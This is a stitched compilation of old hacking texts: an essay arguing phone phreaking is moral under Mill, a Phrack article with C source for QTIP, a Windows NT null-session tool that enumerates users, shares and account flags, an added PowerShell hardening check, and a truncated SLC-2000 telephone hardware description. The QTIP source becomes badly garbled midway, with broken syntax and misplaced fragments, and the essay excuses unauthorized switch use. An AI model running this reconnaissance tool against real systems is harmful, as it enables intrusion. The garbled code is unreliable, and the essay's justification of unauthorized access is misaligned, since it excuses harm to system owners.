The meaning of phone phreaking has changed over the years; 
its initial growth can be traced in a large part to a magazine 
named TAP (Technical Assistance Program) started by Abbie Hoffman 
in 1971 as part of his Youth International Party (YIPL) (Meinel, 
5). The intent at this point in time was to utilize technology 
in order to subvert government and big business institutions. As 
time progressed, phreaking became less politically motivated and 
instead was led more by technology enthusiasts interested in 
learning about the phone systems and how they worked. In 1984, 
2600 magazine was formed by Eric Corley in order to further this 
spread of knowledge (Corley). 


The definition of phone phreaking I will use for the 
purposes of this paper is that which the prominent members of the 
hacking/phreaking "scene" would use. In discussing the 
motivations of a phone phreaker, I speak from both personal 
experience and from numerous conversations with individual 
phreakers over a period of years. Phreaking is the pursuit of 
knowledge concerning how phone systems operate. The skills that 
a phreaker learns in this pursuit of knowledge have the effect 
that they can often gain control of a phone switch in order to 
add additional phone lines, modify billing information, and 
perform other such activities, but these are generally considered 
unrelated to that which an actual phreaker is interested in, and 
I will focus only on the activities of those true phreakers that 
are motivated by the desire for knowledge and not for other 
gains. Generally however, phreaking does involve utilizing the 
resources of a phone company switch without the permission of the 
company owning it, in order to both explore its capabilities and 
to communicate with other phreakers in order to share knowledge. 


John Mill, given his views of morality as found in 
Utilitarianism, would find that phone phreaking is a morally 
right act. In order to find that an act is morally right, it 
should have a net benefit in terms of the happiness it adds to 
the world versus the opposite of happiness it causes (Mill, 7). 
To show that phreaking is morally right, first it must be shown 
that it does have a positive effect on the general happiness in 
the world, and then proceed to show that any negative effects 
that phreaking may have are sufficiently minor so as to be 
outweighed by the positive effects. If the positive effects are 
greater than the negative effects, then clearly the act is 
morally right. 


First, the actual benefit that phreaking has for the 
individuals involved in it is not directly the pursuit of 
happiness, but rather the pursuit of knowledge. Since morality 
is determined by happiness, not knowledge, how knowledge relates 
to happiness needs to be resolved. The reason this pursuit still 
relates to morality is that individuals that are pursuing 
knowledge for no motivation other than itself are doing so 
because the gain of knowledge has become a part of those 
individuals’ happiness. It is in the same way that Mill argues 
the pursuit of virtue can be reconciled with the pursuit of 
happiness that knowledge can also be reconciled (Mill, 35-37). 


Phreaking does have a benefit to the individuals that are 
involved in its practice. This benefit is in the form of a gain 
of knowledge concerning the phone systems. This knowledge is 
gained in generally one of two ways, both of which are common 
methods of learning that the reader will recognize. The first is 
through experimentation and exploration. By accessing the phone 
switch, phreakers are able to experiment with its capabilities 
and teach themselves how to operate it. In the second case, the 
phone switches that phreakers have learned to use are utilized as 
a method of communication with other phreakers. The free 
communication that comes about as a result of the phone system 
knowledge that has been gained allows phreakers to exchange new 
information and teach each other, either as peers or through a 
teacher-pupil relationship, even more about the phone system. In 
both cases, knowledge is gained, and as knowledge is a part of a 
phreaker's happiness, the general happiness of the world is 
increased. 


Any negative impact phreaking has is minimal, and indirect. 
The resources that are being used are possessed by phone 
companies, corporations. A corporation of itself is not a moral 
being, but a corporation has an effect on three different types 
of people: stock holders, employees, and consumers. 


A stockholder's interest in a corporation is purely in the 
profits that it produces. Stockholders could be negatively 
affected by phreakers if a phreaker causes a loss of revenue, or 
an increase in costs. A loss in revenue for a phone company can 
only occur if the phreaker uses some resource that if not in use 
would otherwise be used by a paying customer, or if the phreaker 
herself would have paid for the resource utilization if it had 
not been attainable for free. In the first case, phone systems 
use a technique called multiplexing to handle simultaneous phone 
calls between switches. If a phone system is below capacity, 
there are empty time slices or frequencies (depending on type of 
trunk) in the data that is transmitted between switches. Adding 
a new connection between switches involves only filling one of 
these idle slots, with no degradation of quality for existing 
phone calls, and no marginal cost associated with the additional 
call. It is only in the case where a phone system is filled to 
capacity that a phreaker using a slot would prevent an existing 
customer from using the phone system, resulting in a loss of 
revenue. In fact, phreakers, being more cognizant of this fact 
than the general public, will purposely explore the phone system 
when it is at its lowest capacity times (late at night and on 
weekends) just to avoid this situation. 


The second part of the stockholders' interests is that a 
phreaker would potentially pay for the phone calls she is making 
for free. An attraction of phreaking is that it does not cost 
money to involve oneself in, and most phreakers first start in 
their youth when they do not have access to being able to pay for 
phone calls to other phreakers, or even more to the point there 
is no price they could pay to gain access to a switch. If the 
phone company were to make this available at a price to 
phreakers, almost universally they would not be able to afford 
the price, and would have to stop their gains in knowledge in 
that subject. This would not result in any additional revenue 
for the phone company, only a loss of knowledge that the phreaker 
could have otherwise gained. 


Employees are only impacted if they are either aware of 
something occurring, or have to perform some activity as a result 
of a phreaker's activities. However, a phreaker only interacts 
with the phone company's equipment in an under utilized state, 
and not with employees. Further, phreakers do not cause damage 
or interfere with the operation of the phone company's equipment, 
and so require no employee intervention. In this manner, no 
employees are affected by phreakers. 


Finally, consumers are also not negatively impacted by 
phreakers. A phreaker’s interactions with switches does not 
cause any disruptions in service or prevent consumers from using 
the same switches simultaneously. Further, there is no 
interaction that takes place with consumers as a result of a 
phreaker’s activities, and so they are never impacted in any 
manner. 


It is possible there can be a negative impact as a result of 
the perception of phreakers and based on people with different 
moral viewpoints than the utilitarian view. Some people are 
scared by a phreaker’s knowledge, and some people are intent on 
protecting their resources even from those with moral pursuits. 
These people may become agitated as a result of a phreaker’s 
activities, and although they have no utilitarian reason to be, 
their agitation should still be considered. However, weighing 
the moral righteousness of the knowledge being gained, any 
agitation seems to be greatly outweighed. Based on these 
criteria, it is clear from the utilitarian viewpoint phreaking is 
overall beneficial and is morally right. 


In contrast to the views of Mill, Immanuel Kant would not 
find phreaking to be a moral act. In order to find an act moral 
from a Kantian perspective, it must be in accord with duty (Kant, 
9), universalized (Kant, 14), and then tested for a contradiction 
in thought (Kant, 32) or a contradiction in will (Kant, 32). If 
an action does not succeed in passing these tests, it can not be 
a moral act. 


The goal of phreaking, the pursuit of knowledge, is in 
accordance with duty. An individual has an inclination towards 
improving himself, gaining knowledge being one way of doing so, 
so this would be an imperfect duty to self (Kant, 31). 


There are several possible manners in which the act of 
phreaking could be universalized. One could say "all people 
should use the phone system without paying in order to pursue 
knowledge." This is not a contradiction in thought, a phone 
system that allowed anyone pursuing knowledge to use it free of 
charge could exist and persist. However, there would be two 
major results of having this sort of system. First, the loss in 
revenue from large numbers of people no longer paying would 
result in those communicating when not pursuing knowledge 
subsidizing those that were. Second, a free phone system would 
have an enormous increase in usage, causing it to reach its 
capacity quickly and preventing it from being available to those 
who needed to use it. Nobody wants to have to spend hours 
attempting to make a phone call in order to get through, and so a 
system of this type is a contradiction in will for most people, 
and would thus not be moral. 


A preferred universalization of phreaking would be "all 
people interested in gaining knowledge should be able to freely 
use unutilized corporate resources in order to do so." The goal 
of a corporation is to maximize profits. If a corporation has 
under utilized resources with a value, it is in the company’s 
interest to produce additional revenue based on those resources. 
If a company does not have under utilized resources, it does not 
apply to this universalization. The final case is if a company 
has under utilized resources, but the resources have no value. 

If they have no value, of what use would the resource be to a 
person interested in gaining knowledge (i.e. if it was useful to 
someone, it would have value). So it is a contradiction of 
thought for a company to have an under utilized resource of value 
for an extended period of time; if those seeking knowledge are 
able to recognize an under utilized resource with value, then the 
company would quickly realize that resource does have value, and 
utilize its value for profit or else sell the resource off. 


Because there is no manner in which phreaking can be 
universalized so as to preserve its intent and not provide a 
contradiction of thought or will, it can not be a moral act in 
accordance with the views of Kant. 


In analyzing which of Mill or Kant has a more solid 
argument, it becomes clear that neither philosophy is ideal for 
all situations. Both the utilitarian and Kantian viewpoints have 
disadvantages that are addressed below, however as a whole the 
Mill utilitarian view of phreaking provides a more rational view 
that is applicable to those who are phreakers. 


First, the utilitarian viewpoint of Mill only considers the 
individual act in the context of the current state of the world 
in deciding if it is moral. That is, a single act may in all 
cases contribute to the general happiness of the world, but it 
may also leave the world changed in some other respect that does 
not add to or take away from the general happiness. However, the 
change that has taken place may very well have an impact on how 
that same act or a completely unrelated act would impact the 
world so as to make what was once moral now immoral. Although 
the potential for alternative moral acts remains in that world, 
and so you have not reduced its potential for happiness, what it 
has done is impacted the available choices of others in how they 
can go about acting in a moral manner. This is not a concern of 
Mill, but of those interested in freedom as an end in itself: 
actions promoting the general happiness may adversely affect the 
freedom of others to act in a moral manner. 


The view Kant gives of morality provides that if an act can 
not be universally applied, it can not be morally right. In the 
case of phreaking, is it possible that it is at some point for 
some people a morally right act to phreak, but not for all people 
at all times? The basis for this argument is that there are some 
people who are both honestly extremely interested in the phone 
systems and do not have the resources to explore their interest 
in any reasonable fashion for some period of time. The typical 
case is a phreaker who is a young adolescent that has become 
intrigued with phones. I would contend that for one that is 
truly interested in learning and has no alternative means, 
it is morally right for that person to phreak. 


However, as that person grows older and gains access to 
resources, alternative means become available for him to continue 
to learn about the phone systems (money buys resources, a job at 
the phone company provides an immense opportunity to learn). At 
the point where alternative means are available, it is no longer 
moral for that person to phreak. Where exactly that point occurs 
is a blurred line, but it is certainly not a universal law as 
Kant would imply. 


In summary, the subject of phreaking is certainly a 
controversial subject and would be viewed by many as an out of 
hand immoral activity. But, at closer examination it is actually 
something that is done for very moral reasons and although the 
morality of a phreaker may not necessarily correspond to the 
morality of all others in society, it is certainly in the mind of 
the true phreaker a moral activity in which they are engaging, 
with intelligent rational premises backing up their moral views. 
Although Kant may not agree with the moral views that are held by 
the phreaker, the individual circumstances confronted by the 
individual are not considered and if morality can be decided on 
an individual basis, as Mill allows, then it may just be that the 
Kantian view may be too restricting to account for contemporary 
issues faced in today’s technological society. 
-------[  a Quick nT Interrogation Probe (QTIP) 


--------[  twitch <twitch@aye.net> 


----[ INTRODUCTION 


As you probably already know, certain LanMan derivatives (most notably 
Windows NT) sport a stupid feature known as 'null sessions'. Null sessions 
allow server connections to be established without the hassle and rigmarole of 
username or password authentication. This is reportedly to ease 
administrative tasks (UserManager and ilk utilize them). Also, such silliness 
as the RedButton bug has shown (although in poor form) that an 
interested/malicious third party can glean quite a bit of info this way. 
Once established, these connections default to having 
permissions to display enumerated user and share lists, get information about 
particular users, wander the registry, etc. QTIP takes advantage of this, 
allowing the user to procure far too much information about the target 
machine. It employs no black magic or hidden technique to do this. QTIP 
works via straight API calls. 


As of service pack 3 for NT 4.0, it is possible for the 'informed' system 
administrator to block null sessions through the registry, effectively 
nullifying any threat from QTIP. I do not, however, believe that there is 
such a patch for 3.5.1 machines. Also, it has not been tested against SAMBA 
servers, and as far as the author knows, SAMBA does not support something as 
asinine as null sessions (anyone who knows any differently is invited to mail 
corrections to the author, or directly to Phrack Magazine). 


To prevent these sorts of shenanigans from happening remotely across the 
Internet, the concerned system administrator can block NBT traffic at the 
gateway (this sort of traffic should not be allowed to/from the Internet as 
standard fare). If you are running NT 4.0, install the service packs, and set 
the appropriate registry values to disable the attack. Or use OpenBSD. 
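A defender-side audit of the two mitigations just described, added here as an example and not part of twitch's article or of QTIP. It assumes the RestrictAnonymous value under HKLM\SYSTEM\CurrentControlSet\Control\Lsa (the NT 4.0 SP3 registry control the text refers to); RestrictAnonymousSAM, EveryoneIncludesAnonymous and the Get-NetTCPConnection listener check are later Windows additions and are consulted only where the host has them.

```powershell
# Added defender-side check (not part of QTIP or twitch's article).
# Audits the anonymous-access restrictions that stop null-session
# enumeration, then lists the NBT/SMB listeners the article says must
# never be reachable from the Internet.

$lsaKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'

# Each entry: registry value, the default Windows applies when it is absent,
# and the predicate that counts as "hardened". RestrictAnonymous is the
# NT 4.0 SP3 control; the other two are later refinements of the same idea.
$checks = @(
    @{ Name = 'RestrictAnonymous';         Default = 0; Pass = { param($v) $v -ge 1 } },
    @{ Name = 'RestrictAnonymousSAM';      Default = 1; Pass = { param($v) $v -eq 1 } },
    @{ Name = 'EveryoneIncludesAnonymous'; Default = 0; Pass = { param($v) $v -eq 0 } }
)

function Test-NullSessionHardening {
    param([string]$KeyPath = $lsaKey)

    $props = Get-ItemProperty -Path $KeyPath -ErrorAction Stop
    foreach ($c in $checks) {
        $raw = $props.PSObject.Properties[$c.Name]
        # An absent value means the release default is in force.
        $value = if ($null -eq $raw) { $c.Default } else { [int]$raw.Value }
        [pscustomobject]@{
            Setting  = $c.Name
            Value    = $value
            Present  = ($null -ne $raw)
            Hardened = [bool](& $c.Pass $value)
        }
    }
}

$results = Test-NullSessionHardening
$results | Format-Table -AutoSize

$weak = @($results | Where-Object { -not $_.Hardened })
if ($weak.Count -gt 0) {
    Write-Warning ("Anonymous enumeration is not restricted ({0}); a null-session probe such as QTIP will list users and shares." -f ($weak.Setting -join ', '))
    # Remediation for the SP3-era control (elevated prompt; older systems need a reboot):
    #   Set-ItemProperty -Path $lsaKey -Name RestrictAnonymous -Value 1 -Type DWord
}

# The article's network-level advice: NBT (TCP 139) and direct-hosted SMB
# (TCP 445) should be blocked at the gateway. Show what is listening locally
# so the perimeter rule can be verified against it.
Get-NetTCPConnection -State Listen -ErrorAction SilentlyContinue |
    Where-Object { $_.LocalPort -in 139, 445 } |
    Select-Object LocalAddress, LocalPort |
    Format-Table -AutoSize
```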


----[ THE CODE 


QTIP has a few options. qtip -h supplies the following info: 


usage: qtip [-asug<username>hv] <target> 
   -s: get share list 
   -u: get user list 
   -g <username>: get infos about <username> 
   -d: leave connection established on exit 
   -a: -s + -u 
   -h: display this help 
   -v: be verbose (use twice to be garrulous) 


Seems rather self explanatory. If the verbose flag is set, then -u 
implies a recursive -g. -d is handy if you plan to take a look at the 
registry as well (there's gold in them thar hills). Omission of all flags just 
establishes a null session and exits. <target> can be a fully-qualified 
domain name, ip address, or UNC format. The code compiles like a dream under 
visual c 4.1. There is no makefile included, just link the code against 
kernel32.lib, libc.lib and wsock32.lib. This program is most useful wrapped 
in scripts with something like tping (ip sweeper), and maybe a few registry 
inquisition perl scripts. Feel free to redistribute, just give props where 
props are due, and please let me know if you make any interesting changes. 


<++> qtip/qtip.h
/*
 *  qtip.h
 *  12/04/1997
 *  twitch
 *  twitch@aye.net
 *
 *  a quick nt investigative probe. (mis)uses null sessions to collect
 *  sundry information about a WindowsNT server. distribute as you
 *  please. be alert, look alive, and act like you know.
 *
 *  'i should dismiss him, in order to teach him that pleasure consists
 *   not in what i enjoy, but in having my own way.'
 *                                              -sk, either/or
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <wchar.h>
#include <windows.h>
#include <winsock.h>
#include "lm.h"

#define k16      16384
#define TARG_LEN 255
#define USER_LEN 22

void handle_error(DWORD);
void prepend_str(char *, char *);
int  open_session();
int  procure_userlist();
int  procure_sharelist();
int  parse_cl(int, char **);
void usage(char *);
int  powerup(int, char **);
void bail(const char *);
int  close_session();
void get_usr_info(wchar_t *);

/* couple o globals to make my life easier */
u_int OPT_SHARES, OPT_USERS, OPT_GETUI;     /* -s, -u, -g */
u_int OPT_NODEL, VERB;                      /* -d, -v (count) */
char  target[TARG_LEN];                     /* \\target as given on the command line */
WCHAR utarg[TARG_LEN];                      /* same, wide, for the lm NetUser*() calls */
WCHAR user[USER_LEN];                       /* username currently being looked at */
NETRESOURCE nr;
<-->

<++> qtip/qtip.c
/*
 *  qtip.c
 *  10/04/1997
 *  twitch
 *  twitch@aye.net
 *
 *  a quick nt investigative probe
 *  link against kernel32.lib, libc.lib and wsock32.lib.
 *  qtip -h for usage. distribute as you please.
 *
 */

#include "qtip.h"

int main(int argc, char *argv[])
{
    if( (powerup(argc, argv)) )
        return(1);

    if( (open_session()) != 0)
        return(1);

    if(OPT_SHARES)
        procure_sharelist();

    if(OPT_USERS)
        procure_userlist();

    if(OPT_GETUI)
        get_usr_info(utarg);

    close_session();
    return(0);
}

/*
 * open_session()
 * establish a null session (empty user, empty password) with target
 */
int open_session()
{
    DWORD r;

    nr.dwType = RESOURCETYPE_ANY;
    nr.lpLocalName = NULL;
    nr.lpProvider = NULL;
    nr.lpRemoteName = target;

    if(VERB)
        printf("establishing null session with %s...\n", target);

    r = WNetAddConnection2(&nr, "", "", 0);
    if(r != NO_ERROR) {
        handle_error(r);
        return -1;
    }

    if(VERB)
        printf("connection established\n");

    return 0;
}

/*
 * procure_userlist()
 * just use the old lm NetUserEnum() because there isnt comparable
 * functionality in the WNet sect. i just wish the win32 api was
 * more bloated and obtuse.
 */
int procure_userlist()
{
    NET_API_STATUS nas;
    LPBYTE *buf = NULL;
    DWORD entread, totent, rhand;
    DWORD maxlen = 0xffffffff;
    USER_INFO_0 *usrs = NULL;
    unsigned int i;
    int cc = 0;

    entread = totent = rhand = nas = 0;

    if( (buf = (LPBYTE*)malloc(k16)) == NULL)
        bail("malloc probs\n");
    *buf = NULL;

    if(VERB)
        wprintf(L"\ngetting userlist from %s...\n", utarg);

    /* the api allocates *buf itself; it has to go back via NetApiBufferFree() */
    nas = NetUserEnum(utarg, 0, 0, buf, maxlen, &entread, &totent, &rhand);
    if(nas != NERR_Success) {
        fprintf(stderr, "couldnt enum users, ");
        handle_error(nas);
        goto cleanup;
    }

    cc = sizeof(USER_INFO_0) * entread;
    if( (usrs = (USER_INFO_0 *)malloc(cc)) == NULL) {
        fprintf(stderr, "malloc probs\n");
        goto cleanup;
    }

    memcpy(usrs, *buf, cc);
    for(i = 0; i < entread; i++) {
        /* bounded copy: the name pointers still live in the api buffer */
        wcsncpy(user, usrs[i].usri0_name, USER_LEN - 1);
        user[USER_LEN - 1] = L'\0';
        wprintf(L"%s\n", user);
        if(VERB)
            get_usr_info(utarg);
    }

cleanup:
    if(usrs)
        free(usrs);
    if(buf) {
        if(*buf)
            NetApiBufferFree(*buf);
        free(buf);
    }

    return 0;
}

/*
 * get_usr_info()
 * attempt to gather some interesting facts about a user
 */
void get_usr_info(LPWSTR utarg)
{
    NET_API_STATUS nas;
    USER_INFO_1 usrinfos;
    LPBYTE *buf = NULL;

    if( !(buf = (LPBYTE *)malloc(sizeof(USER_INFO_1))) )
        bail("malloc probs\n");
    *buf = NULL;

    nas = NetUserGetInfo(utarg, user, 1, buf);
    if(nas) {
        fwprintf(stderr, L"couldnt get user info for %s, ", user);
        handle_error(nas);
    }
    else {
        memcpy(&usrinfos, *buf, sizeof(USER_INFO_1));

        /* most of these will never happen, but nothings lost trying */
        if( (UF_PASSWD_NOTREQD & usrinfos.usri1_flags) )
            printf("\t-password not required, how about that.\n");
        if( (UF_ACCOUNTDISABLE & usrinfos.usri1_flags) )
            printf("\t-account disabled\n");
        if( (UF_LOCKOUT & usrinfos.usri1_flags) )
            printf("\t-account locked out\n");
        if( (UF_DONT_EXPIRE_PASSWD & usrinfos.usri1_flags) )
            printf("\t-password doesnt expire\n");
        if( (UF_PASSWD_CANT_CHANGE & usrinfos.usri1_flags) )
            printf("\t-user cant change password\n");
        if( (UF_WORKSTATION_TRUST_ACCOUNT & usrinfos.usri1_flags) )
            printf("\t-account for some other box in this domain\n");
        if( (UF_SERVER_TRUST_ACCOUNT & usrinfos.usri1_flags) )
            printf("\t-account for what is prolly the BDC\n");
        if( (UF_INTERDOMAIN_TRUST_ACCOUNT & usrinfos.usri1_flags) )
            printf("\t-interdomain permit to trust account\n");

        NetApiBufferFree(*buf);
    }

    free(buf);
}

/*
 * procure_sharelist()
 * strangely enough, this retrieves a sharelist from target
 */
int procure_sharelist()
{
    DWORD r;
    DWORD bufsize = 16384, cnt = 0xFFFFFFFF;
    HANDLE enhan;
    void *buf;
    NETRESOURCE *res;
    u_int i;

    if( (buf = malloc(bufsize)) == NULL) {
        fprintf(stderr, "malloc probs, bailing\n");
        return -1;
    }

    nr.dwScope = RESOURCE_CONNECTED;
    nr.dwType = RESOURCETYPE_ANY;
    nr.dwDisplayType = 0;
    nr.dwUsage = RESOURCEUSAGE_CONTAINER;
    nr.lpLocalName = NULL;
    nr.lpRemoteName = (LPTSTR)target;
    nr.lpComment = NULL;
    nr.lpProvider = NULL;

    r = WNetOpenEnum(RESOURCE_GLOBALNET, RESOURCETYPE_ANY,
                     RESOURCEUSAGE_CONNECTABLE, &nr, &enhan);
    if(r != 0) {
        free(buf);
        printf("open_enum failed, sorry- ");
        handle_error(r);
        return -1;
    }

    r = WNetEnumResource(enhan, &cnt, buf, &bufsize);
    if(r != 0) {
        free(buf);
        WNetCloseEnum(enhan);
        printf("enum_res failed- ");
        handle_error(r);
        return -1;
    }

    res = (NETRESOURCE*)malloc(cnt * sizeof(NETRESOURCE));
    if(res == NULL) {
        free(buf);
        WNetCloseEnum(enhan);
        printf("malloc probs, i wont be listing shares.\n");
        return -1;
    }

    memcpy(res, buf, (cnt * sizeof(NETRESOURCE)));
    for(i = 0; i < cnt; i++) {
        if(VERB)
            printf("\nshare name:\t");
        printf("%s\n", res[i].lpRemoteName);
        if(VERB) {
            printf("share type:\t");
            if(res[i].dwType == RESOURCETYPE_DISK)   /* compare, not assign */
                printf("disk");
            else
                printf("printer");
            printf("\ncomment:\t%s\n", res[i].lpComment);
        }
    }

    free(buf);
    free(res);
    WNetCloseEnum(enhan);
    return 0;
}

/*
 * close_session()
 * clean up our mess
 */
int close_session()
{
    DWORD r = 0;

    WSACleanup();
    if(!OPT_NODEL) {
        r = WNetCancelConnection2(target, 0, TRUE);
        if(r != 0) {
            fprintf(stderr, "couldnt delete %s, returned %lu\n", target, r);
            return -1;
        }
        else {
            if(VERB)
                printf("connection to %s deleted\n", target);
        }
    }

    return 0;
}

/*
 * handle_error()
 * util function to deal with some errors.
 */
void handle_error(DWORD err)
{
    switch(err) {
    case ERROR_ACCESS_DENIED:
        fprintf(stderr, "access is denied.\n");
        break;
    case ERROR_BAD_NET_NAME:
        fprintf(stderr, "bad net name.\n");
        break;
    case ERROR_EXTENDED_ERROR:
        fprintf(stderr, "an extended error occurred.\n");
        break;
    case ERROR_INVALID_PASSWORD:
        fprintf(stderr, "invalid password.\n");
break; 
case ERROR_LOGON_FAILURE: 
fprintf(stderr, "bad username or password.\n"); 
break; 
case NO_ERROR 
fprintf(stderr, "it worked\n"); 
break; 
case ERROR_BAD_ NETPATH: 


fprintf(stderr, "network path not found.\n"); 


break; 
default: 
fprintf(stderr, "a random error occurred (%d).\n", err); 
} 
} 
/* 
* prepend_str () 
* util funk to prepend chars to a string 
*/ 
void prepend_str(char *orgstr, char *addthis) 
{ 
orgstr = _strrev(orgstr); 
addthis = _strrev(addthis) ; 


streat(orgstr, addthis); 


3da\n", VERB); 


printf ("verbosity = 


} 


/* 
* powerup () 
* just init stuff and parse the command line 
*/ 


int powerup(int argc, char **argv) 
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orgstr = _strrev(orgstr); 
} 
/* 
* parse_cl() 
o try and make sense of the command line. no, i dont have a win32 getopt. 
cat yes, i know i should 
*/ 
void parse_cl(int argc, char **argv) 
{ 
int dt, "CGi; 
char opt; 
DWORD vj 
OPT_SHARES = OPT_USERS = VERB = 0; 
for(i = 1; i < (argc); i++) { 
if( (*argv[i]) == ’-’){ 
opt = *(argv[i]+l1); 
switch (opt) { 
case ’a’: 
OPT_SHARES = 1; 
OPT_USERS = 1; 
break; 
case ’s’ 
OPT_SHARES = 1; 
break; 
case 'u’: 
OPT_USERS = 1; 
break; 
case 'g’: 
OPT_GETUI = 1; 
if( (strlen(argv[it+1])) > USER_LEN) 
bail("username too long (must be < 21)"); 
ZeroMemory (user, USER_LEN) ; 
cc = strlen(argv[++1i]); 
r = MultiByteToWideChar(CP_ACP, 0, argv[i], cc, user, 
2))3 
break; 
case 'd’: 
OPT_NODEL = 1; 
break; 
case 'v’ 
VERB++; 
break; 
default: 
if( (opt != 'h’) && (opt != '?"7) ) 
fprintf(stderr, "unknown option ’%c’\n", opt); 
usage (argv[0]); 
break; 
} 
} 
} 
if( (OPT_SHARES) && (VERB) ) 
printf("listing shares\n"); 
if( (OPT_USERS) && (VERB) ) 
printf ("listing users\n"); 
if( (OPT_GETUI) && (VERB) ) 
wperintf(L"getting infos about user %s\n", user); 
if (VERB) 


(cc + 
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{ 


struct hostent *hent; 
u_long addie; 

WORD werd; 

WSADATA data; 

char buf [256]; 

int cc = 0, ucc = 0; 


if(arge < 3) 
usage (argv[0]); 


parse_cl(argc, argv); 
ZeroMemory (buf, 256); 
strcpy (buf, argv[arge - 1]); 


/* if not unc format get the ip */ 


if(buf[O] != “\\"){ 


if (VERB > 1) 


printf ("target not in unc\n"); 


werd = MAKEWORD(1, 1); 
if( (WSAStartup(werd, édata)) !=0 ) 


bail ("couldnt init winsock\n"); 


hent = (struct hostent *)malloc(sizeof (struct hostent)); 


if (hent == NULL) 


bail ("malloc probs\n"); 


if( (addie = inet_addr(buf)) == INADDR_NONE) { 


} 
prepend_str (buf, 
} 
else 
fprintf(stderr, 


hent = gethostbyname (buf) ; 

if (hent == NULL) { 
fprintf(stderr, "fatal: couldnt resolve %s.\n", buf); 
return —-1; 

} 

ZeroMemory (buf, 256); 

strepy (buf, inet_ntoa(* (struct in_addr *) *hent->h_addr_list)); 


HALAS 


"target already in unc\n"); 


if( (strlen(buf) > (TARG_LEN - 1)) ){ 
free (buf); 
bail("hostname too long (must be < 255 chars.)"); 
return -1; 

} 

ZeroMemory (target, TARG_LEN); 


strcpy (target, buf) 


1’ 


ZeroMemory (utarg, TARG_LEN) ; 


cc = strlen(target) 


la 


ucc = MultiByteToWideChar(CP_ACP, MB_PRECOMPOSED, target, cc, utarg, cc); 


if(uce < 1){ 


bail ("unicode conversion probs, sorry"); 


return -1; 


} 


return 0; 


} 


void usage(char *prog) 
{ 
fprintf 
fprintf 
fprintf 
fprintf 


a ete ees ee 


stderr, "usage: %s [asug<username>hv] <target>\n", prog); 
stderr, "\t-s:\t\tget share list\n"); 

stderr, "\t-u:\t\tget user list\n"); 

stderr, "\t-g: <username>\tget infos about just <username>\n") ; 
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fprintf(stderr, "\t-d:\t\tleave connection established on exit\n"); 
fprintf(stderr, "\t-a:\t\t-s + -u\n"); 
fprintf(stderr, "\t-h, -?:\t\tdisplay this help\n"); 
fprintf(stderr, "\t-v:\t\tbe verbose (use twice to be garrolous)\n"); 
exit (0); 
} 
/* 
* bail () 
* just whine and die 
* / 


void bail(const char *msg) 

{ 
fprintf(stderr, "fatal: %s\n", msg); 
close_session(); 
exit(1); 

} 


<--> 


----[ EOF 
----[ The Subscriber Loop Carrier (slick)

                                  by Voyager [TNO]


Overview

A Subscriber Loop Carrier (SLC) (often pronounced "slick") is a
multiplexer which allows a large number of analog lines to be provided
over a very small number of digital lines. A good example is the AT&T
SLC 5, which allows 192 subscriber loops to be provided through two or
four digital lines. SLCs are also referred to as Digital Loop Carriers
(DLCs).


The first SLC was installed in 1971. As of 1995, between 5 and 10% of
all lines are served by SLCs, as are roughly 50% of all new lines built 
each year. SLCs are available from quite a few vendors. This article 
focuses on the extremely popular SLC-2000 from AT&T. 


A SLC usually consists of two separate subsystems, the Central Office 
Terminal (COT) and the Remote Terminal (RT). The COT is connected to 
the RT via a DS1 circuit. The DS1 circuit may be carried over actual Tl 
lines, or it may be carried over another medium such as lightwave or 
digital radio. The RT is then connected to the subscribers using a 
Voice Frequency (VF) circuit. The VF circuit is what you and I would 
recognize as our normal phone line. 


This diagram illustrates a subscriber loop constructed using an SLC:

  Central Office (COT) --- DS1 circuit --- RT --- VF circuit --- Residence


The Central Office Terminal

The SLC-2000 COT is a modular design usually consisting of the following
components:

    Access Resource Manager (ARM) shelf
    Metallic Distribution Shelf (MDS) shelves
    Heat baffles
    Alarm and Test Unit (ATU)
The Remote Terminal

The SLC-2000 RT is a modular design usually consisting of the following
components:

    Access Resource Manager (ARM) shelf
    Metallic Distribution Shelf (MDS) shelves
    High Density Fiber Optics Shelf (HDOS) shelves (FITL only)
    Cooling fans
    Alarm and Test Unit
    Heat baffle

An SLC-2000 RT configured for a Metallic Application is stacked, from
the top, as follows:

    Access Resource Manager (ARM) shelf
    Heat baffle
    Metallic Distribution Shelf (MDS)
    Metallic Distribution Shelf (MDS)
    Heat baffle
    Metallic Distribution Shelf (MDS)
    Metallic Distribution Shelf (MDS)

[Diagram: an SLC-2000 RT configured for a Fiber In The Loop (FITL)
Application; only the Metallic Distribution Shelf (MDS) labels of the
original drawing survive.]
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SLC-2000 Shelves 


The SLC-2000 is divided into a number of shelves, each of which hold 
circuit cards that are responsible for specific functions within the 
SLC. Some shelves are found only in COTs, others are found only in 
RTs, while most shelves are used in both COTs and RTs. 


Access Resource Manager (ARM) Shelf 


The ARM shelf provides feeder interface, bandwidth management and 
circuit maintenance features. 


The ARM shelf consists of the following functional component groups: 


User Interface Panel (UIP) 

Integrated Test Head (ITH) 
Provisioning Display Controller (PDC) 
Bandwidth Management Complex 
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DS1 distribution 
DS1/VT feeder interfaces 
SONET feeder 


The functional components of an ARM shelf, reading left to right across
the shelf, are:

    ESD ground jack
    Power Converter Unit (PCU)
    Transmission Signaling Unit (TSU)
    Analog Measurement Unit (AMU)
    Power Amplifier Unit (PAU)
    Craft Access Unit (CAU)
    System Memory Unit (SMU)
    Provisioning and Display Controller (PDC)
    Link to Alarm and Networks (LAN)
    DS1 interfaces (eight slots)

    Bandwidth Management Complex:
        Test Head Controller (THC)
        System Controller (SYSCTL)
        Overhead Controller (OHCTL)
        STS-1 Multiplexer (MXRVO)
        Optical Line Interface Unit (OLIU)
        Synchronous Timing Generator (TGS)


The User Interface Panel (UIP) represents the highest level of
interaction possible with the SLC-2000 without plugging some other
piece of equipment into it. The panel carries the following:

    Indicators: Abnormal, Attention, Panel Fault, NE Activity,
        FE Activity, Critical, Major, Minor, Power Minor, Power,
        Session, Update, ACO
    Display and buttons: Alphanumeric Message Display (AMD), Scroll
        buttons, Enter, Escape, LED Test, ACO, Update
    Connectors: ESD ground jack, fuses, power test points, CIT
        connector, DDS clock connector, and DDS, DS0, DS1, T-R,
        T1-R1 and E&M maintenance jacks
There are many connections on the UIP. The Electrostatic Discharge
(ESD) ground jack is for a static control wrist strap. The Craft
Interface Terminal (CIT) connector is a DB-25 for plugging in a CIT or a
PC running terminal emulation software. The DDS clock connector
provides a clock source for test sets. The Power Test Points allow you
to monitor the -48v power to the unit.

There are many LED's on the UIP. The Attention LED is yellow when
there is something new on the Alphanumeric Message Display (AMD). The
Panel Fault LED is red when the UIP is in need of repair. The Power LED
